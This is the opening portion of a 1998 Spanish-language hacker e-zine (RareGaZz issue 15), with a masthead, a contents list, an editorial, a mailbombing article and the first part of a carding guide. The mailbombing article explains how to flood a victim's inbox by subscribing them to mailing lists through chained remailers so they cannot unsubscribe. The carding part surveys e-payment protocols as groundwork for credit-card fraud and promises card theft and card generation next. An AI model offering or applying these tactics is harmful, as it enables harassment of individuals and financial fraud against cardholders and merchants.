Copy Link
Add to Bookmark
Report

RareGaZz Issue 15

eZine's profile picture
Published in 
RareGaZz
 · 30 Dec 2020

  


----------------------------------------------------
A¤o 2/Numero 15 ³ Noviembre de 1998
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
³
----------------------------------------------------

ooooooo oo ooooooo oooooo ooooo oo oooooo oooooo
$$""$$" o$"$$ $$""$$" $$ o$$""o, o$"$$ """$$ """$$
$$o$$" $$ $$ $$o$$" $$$$$$ $$ $$ $$ $$ $$ $$
$$$$$ $$ $$ $$$$$ $$"""" "$o $$ $$ $$ $$" $$"
$$" $$ $$$$$$$ $$" $$ $$ "$o $$ $$$$$$$ o$" o$"
$$ "$$ $$ $$ $$ "$$ $$ooooo "$o$$ $$ $$ o$$oooo o$$oooo
"" """ "" "" "" """ """"""" "" "" "" """"""" """""""

----------------------------------------------------
³
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
"La verdad nos hara libres"
----------------------------------------------------


Editor: GuyBrush
Co-editores: Azumlord, Cytorax, Senpai, PaTa,
Yo_Soy y 12r
RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax
Grovvy, Guybrush, KillerBot
Mr.X, Orion, PaTa, RareTrip,
Senpai, ServerHacker, Vov_77
y Yo_soy.
Agradecimientos: Dr_Format^, Unamed Person, SatMex,
\Wend|g0, ToMaCHeLi, ZeD, CHack,
Mr. Aztech," >< TONE " y John
Distribuidores Oficiales: raregazz.acapulco.uagro.mx
raregazz.islatortuga.com
E-mail Ofical: raregazz@iname.com
Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team,
SET y JJF Hackers.
Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord
despues de una mala noche.
Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro
los archivos del ftp de la lista de los
RareDudeZz y el(los) idiota(s) lamer(s)
que avisaron a los de geocities sobre la
pagina de SET.
Comentarios (Oficiales): Mas vale tarde que nunca :-)


ÚÄÄ[ C o n t e n i d o s ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄ´ ³
³ ³ +Editorial ------------------------> GuyBrush ³
³ ³ +Tecnicas de Mailbombing ----------> Senpai/GuyBrush ³
³ ³ +Fraude electronico (Carding) -----> PaTa ³
³ ³ +Telefonos celulares (Phreacking) -> Azumlord ³
³ ³ +Guia para Hackear Hotmail --------> \Wend|g0 ³
³ ³ +Crackear PWL's con el PLWOSR -----> CHack ³
³ ³ +Agentes Inteligentes -------------> 12r ³
³ ³ +Varios trucos interesantes -------> SatMex ³
³ ³ +Maneras de colarse en el HD (IRC)-> ToMaCHeLi/ZeD ³
³ ³ +IRC (guia rapida) ----------------> Yo_Soy ³
³ ³ +Cisco Routers --------------------> GuyBrush ³
³ ³ +Hack basico ----------------------> Mr. Aztech/ ³
³ ³ " >< TONE "/John ³
³ ³ +Guia de instalacion de CPI's -----> Unamed Person ³
³ ³ +Virus Batch (2a Parte) -----------> Yo_Soy ³
³ ³ +Corba ----------------------------> 12r ³
³ ³ +Blue Boxing en Argentina ---------> Dr_Format^ ³
³ ³ +Entrevista a X-Ploit Team --------> GuyBrush ³
³ ³ +Bugs & Exploits ------------------> PaTa ³
³ ³ +Historias del IRC (segunda parte)-> GuyBrush ³
³ ³ +Noticias -------------------------> GuyBrush ³
³ ³ +Cartas del Lector ----------------> GuyBrush ³
³ ³ +Llaves PGP -----------------------> RareGaZz Staff ³
³ ³ +Despedida ------------------------> GuyBrush ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

"Plante un olivito, que espero que crezca sano y saludable a mi lado"
<< PaTa >>

01010101010101010101010101010101010101010101010101010101010101010101010
10 01
01 #!/bin/RareGaZzsh 10
10 # La informacion contenida en este zine tiene fines completamente 01
01 # de entretenimiento y educativos, los autores de la informacion 10
10 # aqui presentada no se hacen responsables de los posibles da¤os 01
01 # que se puedan ocasionar...... 10
10 01
01010101010101010101010101010101010101010101010101010101010101010101010



Ä[ E d i t o r i a l ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Este ezine es muy especial para mi ya que es el ultimo que edito. Para bien
o para mal, debo dejar RareGaZz temporalmente. Resulta que me cambio de
domicilio y de momento andare unos meses sin telefono, pero no se preocupen
que seguire sus actividades aunque sea desde un cyberc@fe.

Azumlord se queda encargado de la direccion de RareGaZz y yo dejare de leer
mi correo ya que estare algo desconectado de este mundillo durante algun
tiempo. Pero quiero que sepan todos que, de una manera u otra, GuyBrush
estara siempre con ustedes.


-= GuyBrush =-

http://raregazz.acapulco.uagro.mx
http://raregazz.islatortuga.com
raregazz@iname.com


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Tecnicas de MailBombing - Senpai/GuyBrush ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Como todos sabeis, el mailbombing es el 'arte' de joderle a alguien el buzon
de correo. Al igual que en todo, existen algunas tecnicas menos lamers que
otras. Ademas, cualquier persona con dos dedos de frente y algunos minimos
conocimientos debe ser capaz de rechazar este ataque.

La peor forma de realizar un bombardeo es coger el tipico programa de mail-
bombing y enviar 500 mails o ficheros de 20 Mb sin ni siquiera comprobar si
el server muestra tu IP ... y luego vienen los problemas.

Bien, pues en el caso de que alguno sufra un ataque asi, no hay mas que
acceder por telnet al buzon de correo (puerto 110) y borrar todos los mails.
Como mucho perdemos algun mensaje que nos interese, pero ya esta. Ademas, si
el que nos bombardeo puso el mismo subject en todos los mails, mas facil
todavia para borrarlos.

Otra tecnica mejor, seria suscribir a nuestra victima a muchas listas de
correo. Y si estan en distintos idiomas mejor.

Pero esto tambien puede solucionarse rapidamente. Basta con leer bien los
mails y enviar el 'unsuscribe' correspondiente. Ademas, la mayoria de listas
de correo piden una confirmacion antes de suscribir a nadie. Pero esto
tambien lo puede preveer el atacante y falsificarlo, al igual que el mail de
suscripcion.

Pensando en algo mas sofisticado, podriamos crear una cuenta en hotmail y
usar un remailer que nos redireccione alli el correo (por ejemplo, en iname
o en bigfoot). Una vez suscritos a las listas y enviadas las confirmaciones
correspondientes, ya podemos modificar el 'forward' del remailer para
enviarlo a un nuevo destinatario ... imaginais quien? si, la pobre victima.

Claro esta que si el usuario atacado es un poco 'cuco' puede ver el origen
de esos mails (vienen del ramailer) y falsificar el 'unsuscribe'.

Pero, que ocurriria si en vez de un remailer usamos dos? podemos suscribir
el primero y redireccionar los mails al segundo; y de alli a la victima. De
esta forma seria imposible que se dessuscribiera ya que nunca sabra cual es
la direccion que realmente esta suscrita.

Bueno, pues eso es todo. Si se os ocurre alguna tecnia mejor ... enviarla.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Fraude electronico (Carding) - PaTa ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»º
ººÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»ºº
ººº FRAUDE ELECTRONICO > CARDING < LA GUIA DEFINITIVA ººº
ººº por PaTa ººº
ººÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼºº
ºÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

CONTENIDOS

1¦ PARTE

1 ................ Descripcion
2 ................ Introduccion
2.1 .............. Tipos de pago
2.2 .............. Cifrado de datos
3 ................ Tipos de protocolos
3.1 .............. Cheques Electronicos FSTC
3.2 .............. First Virtual
3.3 .............. CyberCash C-5
3.4............... DigiCash
3.5 .............. Virtu@l Cash
3.6 .............. SSL
3.7 .............. Despedida

2¦ PARTE

3 ................. Introduccion
4 ................. Obtener tarjetas de credito
4.1 ............... Robar tarjetas
4.2 ............... Robar tarjetas sin violencia
5 ................. Trashing
6 ................. Verificar la tarjeta
7 ................. Ingenieria social
8 ................. Recojer el paquete
9 ................. Estructura de la tarjeta de credito
10 ................ Crear tarjetas
10.1 .............. Algoritmo para la creacion de tarjetas de credito
11 ................ Compra por telefono
12 ................ Varios
13 ................ Conclusiones
14 ................ Agradecimientos


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<


1.- DESCRIPCION

Bueno este articulo que vas a leer ahora es el resultado de un duro
trabajo y el seguimiento de algunas lista de correo sobre el tema, al inscri-
birme me interesaba la idea pero segun iban pasando los dias me intereso mas
y mas, por lo que decidi profundizar en el tema, la primera parte que vas a
leer te puede resulta un poco aburrida, pero nunca te has preguntado,
¨Como se realizan las compras por Internet? Yo si, y me dispuse a buscar
informacion, bueno y aqui esta. Es una informacion tecnica y puede que en
algunos casos se te haga pesada, pero esta enfocada desde el punto de vista de
la seguridad obviando otros temas necesarios en las comunicaciones que no nos
interesan. En la segunda parte podras encontrar informacion para hacer carding
pero para saber correr antes hay que saber andar.

La segunda parte la podras leer en el siguiente numero de la revista.


2.- INTRODUCCION


El salto del milenio apunta hacia nuevos habitos de consumo. El
consumidor del siglo XXI buscar  la comodidad en sus compras. Los estudios
sobre el comercio electronico e-commerce, vaticinan, segun la prestigiosa
Forrester Research (www.forrester.com) crezca de los 121 millones de dolares
de 1997 a los 3800 en el 2002, solo en EE.UU. ¨Entonces porque no intentar
sacar algo de provecho nosotros ciudadanos de a pie?

El contra-reeenbolso, es un medio perfecto para el usuario, aunque
claro hemos evolucionado desde el rudimentario trueque, hasta la moderna
pl stico ( pasando por los metales preciosos y el papel moneda),...., contra-
reenbolso,... para finalmente llegar al comercio electronico, en todos los
sitemas ha habido formas de enga¤ar y sacar partido , quien ha dicho que en
este ultimo no?

Como es bien conocido, los medios de pago tradicionales sufren numerosos
problemas de seguridad: falsificaci¢n de billetes, falsificaci¢n de firmas,
cheques sin fondo, etc. Por otro lado, los medios de pago electr¢nicos, adem s
de estar sujetos a los mismos problemas anteriores, presentan riesgos
adicionales, pues a diferencia del papel, los documentos digitales pueden ser
copiados perfectamente y cuantas veces se desee, las firmas digitales pueden
ser falsificadas por cualquiera que conozca la clave privada del firmante, la
identidad de una persona puede ser asociada de forma inequ¡voca con la infor-
maci¢n relacionada en cada pago, etc.

Las tarjetas de credito son el instrumento mas utilizado en el comercio
electronico. Supone un cobro rapido para el vendedor a cambio de una peque¤a
comision. Ademas de que todo el mundo tiene una, se estan convirtiendo en
parte importante de nuestra vida, no salimos sin ellas.

Me voy a centrar en que el pago se ordena a traves de Internet,
mientras que la validacion y realizacion efectiva, se realiza a traves de los
circuitos normales que las entidades poseen a tal efecto, de forma
independiente de si la transacion ha sido ordenada desde Intenet o no.

Aqui pongo los sistemas que mas se utilizan en Internet. Me dejo cosas
como el SET pero eso sera para otro articulo ya que me parece un tema muy
interesante


2.1 TIPOS DE PAGO

Los dos sistemas clasicos por excelencia de pago no efectivo son los
cheques convencionales y las tarjetas de credito. En el sistema financiero,
el dinero toma forma de entrada en los libros de los bancos y de otras
instituciones financieras. Esto para el usuario se refleja en la existencia
de una cuenta deposito en la que se graban los depositos del cliente y se
realizan pagos en forma de cheques o transferencias.

Un cheque es un documento escrito por el usuario de la cuenta
y autentificado por el mismo que se entrega a un comerciante, quien a su vez
lo acepta antes de presentarlo en su banco. Si el banco cobrador y el del
vendedor son los mismos, todo se reduce a una compensacion interna de apuntes.
Si por le contrario, ambos disponen de cuentas en bancos distintos, el banco
cobrador debera presentar el cheque y recojer los fondos a traves de un
sistema de ajuste o camara de compensacion ACH (Automatic Clearing House).
Esta camara puede pertenecer al estado, por ejemplo, al banco emisor de la
moneda, o tratarse de un sistema intermediario privado, como VisaNet ACH
Service. En el momento de la entrega del cheque, el cobrador no sabe si este
se encuentra respaldado por fondos por lo que corre cierto riesgo. Pero los
pagadores tambien asumen determinados riesgos frente a la posible existencia
de cheques falsos ya que reciben los extractos de las cuentas despues de pagar
sin confirmacion previa al pago.

Otra alternativa es la utilizacion de un sistema de credito, como una
tarjeta o un servicio bancario de adelantos de descubiertos. EL comerciante
se asegura el pago y el emisor asume la responsabilidad del cobro. El ajuste
se realiza entonces cuando el comerciante envia un lote de autorizaciones a su
banco entre este y el banco emisor de la tarjeta

Existen dos tipos de operaciones con tarjeta de credito que suponen
distinto balance de riesgo en funcion de si la tarjeta se encuentra presente o
no.
En el primer caso, la tarjeta presente, todo el riesgo del
credito pasa al comerciante. En estos casos el comerciante puede verificar la
firma del titular comparando la que este imprime en el recibo con la que
aparece en la tarjeta. Por ello, sera responsabilidad suya si se hace uso
fraudulento de la tarjeta de un tercero. La integridad de la transacion queda
garantizada para el cliente mediante un papel-copia del recibo. El nombre de
la cuenta se autentifica a traves del numero de la tarjeta y la transacion
puede ser confirmada enviando los datos por medio de una red privada de la
asociacion.

En el segundo caso, la tarjeta no presente, el consumidor asume
cierta parte (peque¤a) del riesgo ante un posible fraude ya que es
responsabilidad suya proteger el numero de tarjeta, debido a que este es el
unico medio de identificacion del pagador en la transacion ( como mucho se
podra pedir la fecha de caducidad y direccion y comprobarlas). Este es el
sistema empleado en los pedidos por telefono o internet (en pedidos como
correo o fax, aun se cuenta con la firma del titular como medio de no
repudiacion, que no de autentificacion). Por ello, dado que nada impide que
se pueda colocar un sniffer (programa que monotoriza todos los datos que pasan
por cierto ordenador) en la red, los numeros de tarjeta deben viajar
encriptados por la red.

Hay diferencia entre el uso de cheques y de tarjetas. Un pago
mediante cheques supone dinero pagado para el consumidor, que asumira todos
los inconvenientes derivados de una falla del comerciante. SIn embargo, si se
paga con tarjeta se puede pedir la restitucion del importe. EL problema pasa
a ser del banco emisor de la tarjeta, que debera pedir cuentas al del
comerciante.

Considerando que el cyber-espacio no pueden ser iguales las transaciones
que de la forma clasica se deben tener en cuenta:

- Seguridad: La criptograf¡a moderna proporciona complejos mecanismos
matem ticos que evitan el fraude. Por otro lado, la seguridad es un tema
complejo que involucra muchos otros factores: protocolos, est ndares,
autoridades de certificaci¢n, etc.
- Verificacion de la autorizacion de las transaciones, para evitar
fraudes. En el modelo clasico esta verificacion se hace mediante firmas en
tarjetas de credito o en cheques, en el mundo electronico se suelen usar
aunque no siempre las firmas digitales.
- Confidencialidad : Ciertos datos intercambiados durante una
transacci¢n de pago necesitan ser ocultados a la vista de todo el mundo salvo
para el agente al que van destinados dichos datos.
La confidencialidad es normalmente garantizada mediante el cifrado de datos.
Sin embargo, ‚sta cuesti¢n est  resultando ser un problema en la mayor¡a de
los pa¡ses debido a las restricciones impuestas por los diferentes gobiernos
para utilizar algoritmos criptogr ficos de cifrado de datos con un alto nivel
de seguridad. En algunos pa¡ses ( Francia) el cifrado de datos est  absoluta-
mente prohibido sin el permiso de la oficina gubernamental correspondiente y
normalmente sin el dep¢sito previo de las claves de cifrado en dicha oficina.
En otros pa¡ses (EE.UU.) se restringe la utilizaci¢n de estos algoritmos al
territorio nacional, debiendo utilizar una versi¢n mermada del algoritmo si se
quiere utilizar m s all  de sus fronteras.
- Garantia de la integridad de las ordenes, con el fin de evitar abusos
por parte de los comerciantes. En el sistema habitual se emplean papeles
especiales, en el mundo electronico se emplearan certificados digitales,
descripciones encriptadas del intermnediario, y se utilizaran recibos
digitales.
- Confidencialidad: No solo proteger los numeros y campos claves sino
la privacidad del usuario, ocultando incluso a los ojos de los intermediarios.
- Integridad: Otro aspecto importante en todo sistema de pago electr¢-
nico es la integridad de los datos intercambiados entre los agentes del
sistema, m xime cuando esos datos se refieren a importes de un pago, a un
n£mero de cuenta bancaria, etc. La integridad de las comunicaciones es
garantizada mediante c¢digos de autenticaci¢n de mensajes (MACs), funciones
resumen y firmas digitales. En el caso de la relaci¢n cliente - comercio, esto
s¢lo es posible cuando el cliente est  en posesi¢n de un dispositivo con
capacidad de c lculo y de almacenamiento seguro de claves, como es el caso de
una tarjeta inteligente.
As¡ por ejemplo, las claves criptogr ficas de clientes y comercios suelen
almacenarse en tarjetas inteligentes y m¢dulos de seguridad (SAMs) respecti-
vamente. Los datos en los servidores de las entidades financieras que inter-
vienen en el sistema de pago de son almacenados en b£nkers de seguridad que
normalmente se encuentran duplicados para evitar las posibles p‚rdidas de
informaci¢n como consecuencia de posibles fallos.
- Ajuste de cuentas: Se recurria a las redes financieras clasicas.
- Autentificacion: En todo sistema de pago los participantes del
sistema deben demostrar que son los que dicen ser. Para evitar los fraudes.
En el caso de tarjetas inteligentes (con microprocesador, dotadas por
tanto de una capacidad de c lculo) esto se realiza mediante alg£n protocolo
criptogr fico de autenticaci¢n, mientras que en el caso de tarjetas con banda
magn‚tica, se realiza mediante una verificaci¢n visual de ciertos datos
grabados en la superficie de la tarjeta (hologramas, firmas, etc.).
En los sistemas basados en tarjetas, se suele verificar tambi‚n la
asociaci¢n correcta de la tarjeta con su poseedor (Titular de la cuenta
asociada a la tarjeta). Esto se realiza normalmente a trav‚s de n£meros de
identificaci¢n personal (PIN). Lo mismo ocurre en los sistemas de pago a
trav‚s de redes donde se necesita una autenticaci¢n de la persona f¡sica que
utiliza en un instante determinado el sistema.
- Confirmacion de la transacion. Para evitar que nadie suplante
nuestra personalidad.
- Anonimato: Si una persona realiza un viaje en un medio de locomocion
no privado, y paga en efectivo no hay forma de monotorizarle, pero si en
cambio paga con una tarjeta de credito, (quien quiera ver un ejemplo practico
que se lea "El Informe Pelicano"). Pero si lo paga con trajeta de credito
puede ser posible recontruir su recorrido, e incluso los sitios por donde ha
pasado y pagado con su tarjeta. Esto mismo ocurre con todo tipo de compras.
No obstante, el anonimato constituye sin duda uno de los aspectos m s
pol‚micos de estos sistemas, ya que mientras para unos ser¡a base irrenun-
ciable de la libertad econ¢mica y el derecho a la intimidad, para otros podr¡a
constituir una puerta abierta a la delincuencia y el blanqueo de dinero.
- Independencia: El uso de dinero digital no deber¡a estar restringido
a una red, organizaci¢n o pa¡s concreto, sino que deber¡a ser independiente de
esas limitaciones y f cilmente utilizable desde cualquier punto del planeta.
Aqui una peque¤a descripcion de los medios de pago, no voy a entretenerme
mucho con ellos ya que se podria hablar bastante:


2.2 CIFRADO DE DATOS

Tenemos que tener en cuenta que nuestro dinero viaja por la red y
cualquiera puede tener acceso a ello, por lo que sera basico que nuestras
transacciones vayan encriptadas. Internet en un medio basicamente inseguro
por lo que las medidas de seguridad deben ser altas.
La mayor parte de protocolos que utilizan los siguientes sistemas
utilizan algoritmos criptogr ficos de clave p£blica (RSA), de clave secreta
(DES), o ambos a la vez, para cifrar todos los datos importantes, de forma que
s¢lo puedan ser accesibles a las partes involucradas en las operaciones, y
todos ellos tienen buen cuidado en que su empleo sea absolutamenarente para el
usuario.
Aunque puedas pensar que el cifrado sea absolutamente necesario, no
utilizaba ninguna clase de cifrado, se basaba en el uso del correo electronico
El sistema de pagos de First Virtual ha sido retirado recientemente de este
mercado, pese a habersido uno de sus pioneros.


3 TIPOS DE PROTOCOLOS

3.1 CHEQUES ELECTRONICOS FSTC (Financial Services Technology Consortium)

El pagador debe contar contar con un procesador seguro, que se
implementa en forma de tarjeta inteligente.
Este procesador es el encargado de generar los cheques que consisten,
simplemente en ordenes de pago firmadas digitalmente. Los cheques se trasmiten
al comerciante que tambien los acepta firmandolos, tambien digitalmente y los
envia al banco, que los hara efectivos a traves de la una red ACH clasica.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Esquema de funcionamiento de cheques FSTC ³
³ ®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯ ³
³ ³
³ ³
³ ³
³ Pagador Ä-Ä> Cueque ³
³ Firma Pagador ³
³ Certificado Kpp ÄÄ--> Cobrador Ä--> Cheque ³
³ Firma pagador ³
³ Certificad Kpp ³
³ Firma Cobrador ³
³ Certificado Kpc ³
³ ³ ³
³ ³ ³
³ Banco Cobrador <-Ä ACH Ä--> Banco pagador <-ÄÄÄÄÙ ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


3.2 FIRST VIRTUAL (FV)

Fue uno de los primeros en aparecer con al pecularidad de no hacer uso
de la criptografia. Un consumidor que desee hacer uso del sistema primero
debe registrarse en el mismo, tras lo que obtiene un Virtual PIN, ID o
identificador de First Virtual. Para ello debe de enviar un numero de tarjeta
de credito, VISA o MasterCard, por medio off-line, como telefono o fax. Una
vez registrado, quiera hacer una compra a un comerciante o acceder a
informacion restringida en un servidor que emplee el sistema

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Esquema del sistema First Virtual ³
³ ®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯ ³
³ ³
³ PAGADOR Virtual Pin (1) ÄÄÄÄÄÄÄÄ--> PAGADO <-ÄÄÄÄÄÄÄÄÄÄ¿ ³
³ / \ <-ÄÄÄÄÄÄÄÄ (4) informacion / \ ³ ³
³ ³ ³ ³ ³
³ ³ ³ ³ ³
³ | ³ ³ ³
³ Quieres | | ³
³ pagar? Solicitud (2) Respuesta ³
³ (5) Ä-->ÄÄÄÄÄ-<-Ä- FIRST -->ÄÄÄÄÄ--ÄÄÄ-<--Autorizacion (3) ³
³ Respuesta VIRTUAL ->ÄÄÄÄÄ--ÄÄÄ-<-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³
³ | ³
³ ³ ³
³ ³ (7) ³
³ \ / ³
³ BANCO PAGADOR <ÄÄÄÄÄ-- ACH ÄÄÄÄÄÄÄ-->BANCO COBRADOR ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


Para obtenerlo recibiremos un mail con una clave de doce digitos, y un
numero de telefono donde confirmarlo. Mantener un PIN cuesta 5 dolares al a¤o
aproximadamente. Como vemos los datos se envian por un medio off-line.

Le bastara presentar su Virtual PIN al mismo. El comerciante se
conectara a un servidor FV para comprobar si es correcto, y de ser asi, enviara
la mercancia o dara paso libre a la informacion.
Para realizar un pago al comerciante, First Virtual, envia un e-mail la
consumidor en el que le indica la operacion y le pregunta si desea paga o no.
El consumidor puede responder "yes", "no", "fraud". Mediante este sistema
el comerciante no llega nunca a saber el numero de tarjeta del consumidor, ni
llega nunca a viajar por la red.

El protocolo de validacion de FV es el mas lento de todos los medio de
pagos electronicos, no hace uso de la criptografia lo que da al usuario una
falsa sensacion de seguridad , si se dota de anonimicidad al usuario frente al
comerciante.


3.3 CYBERCASH: C-5

Es uno de los medios de pago electronicos pioneros. La empresa fue
creada en 1994 y el sistema CyberCash se encuentra operativo desde abril de
1995. Se trata de un sistema integrado con el WWW que utiliza un protocolo
propio manejado por un software que debe ser distribuido tanto a comerciantes
como a consumidores. Constituye una pasarela entre Internert y las redes de
autorizacion de emisores de tarjetas, contando para ello con la experiencia
ganada con el sistema Verifone, de autorizacion de tarjetas por telefono, del
cual deriva. El consumidor cuenta con un software "wallet", o monedero que
puede ligar a varias cuentas bancarias o a las tarjetas de credito. El
sotfware encripta todos los datos, realiza un registro de todas las transa-
ciones y se encuentra protegido mediante contrase¤a. En el lado del comer-
ciante se situa un software similar.
Cuando un usuario baja el softwre de CyberCash, genera un par de claves
publica, Kp, y privada, Ks para el. El sistema empleado es RSA de 1024 bits.
A continuacion envia Kp al servidor de CyberCash que almacena en una base de
datos. De esta forma solo CyberCash sabe las claves publicas de todos los
interlocutores posibles. La comunicacion entre consumidor y comerciante se
lleva a cabo en claro, mientras que la comunicacion de estos con CyberCash se
realiza de forma protegida. Para ello se emplea una clave de sesion DES
aleatoria de 56 bits que se ditribuye encriptada con la llave publica del
interlocutor. CyberCash tiene incrustada su propia llave publica en el
software por lo que cualquiera puede comunicarse con el. Un dato importante es
que al clave DES es de 56 bits cuando por las leyes de la legislacion
americana antes fijaban un maximo de 40 bits, y es que CyberCash consigio un
permiso especial.

La transacion se lleva a cabo de la siguiente manera:

1.- El cliente seleccicona un item a adquirir mediante www y
elabora un pedido.
2.-El software del comerciante envia "la facturas proforma" al
software " wallet". La factura proforma es texto en claro, firmado
digitalmente en el que figura una descripcion de la compra asi como las
tarjetas de credito aceptadas. Para la realizacion de firmas digitales se
emplean funcines hash MD5 y claves secretas RSA. A su recepcion, el sofware
"wallet" da a elegir al usuario entre aquellas tarjetas que tiene registradas
y le pide autorizacion para realizar el pago.
3.- Previa confirmacion del usuario, el software "wallet" del
cliente genera un mensaje de pago y lo envia la comerciante. Este mensaje
consiste en un hashing de la factura junto con las instruccuiones de pago,
todo ello firmado digitalmente y encriptado para CyberCash.
4.- A la recepcion del memsaje, el comerciante, que no puede
descrifarlo simplemente a¤ade la informacion al pedido (tambien firmada
digitalmente) y lo remite a CyberCash.
5- CyberCash desencripta y compara los dos mensajes. Si
coinciden los datos, solicita confirmacion, y a traves de la red financiera y
trasmite la respuesta al comerciante para que este pueda cerra la transaccion
con el cliente.

Todo este proceso se lleva a cabo en un periodo de tiempo inferior a un
minuto. El proceso descrito es el caso mas habitual, no obstante, el protocolo
CyberCash es mucho mas complejo y contempla la posibilidad de reintregos,
anulaciones y solicitud de estado. Una version antigua se puede encontrar en
Internet en forma RFC.

Respecto a la proteccion del consumidor cabe destacar que, al
encriptarse la orden de pago para CyberCash y no para el comerciante este no
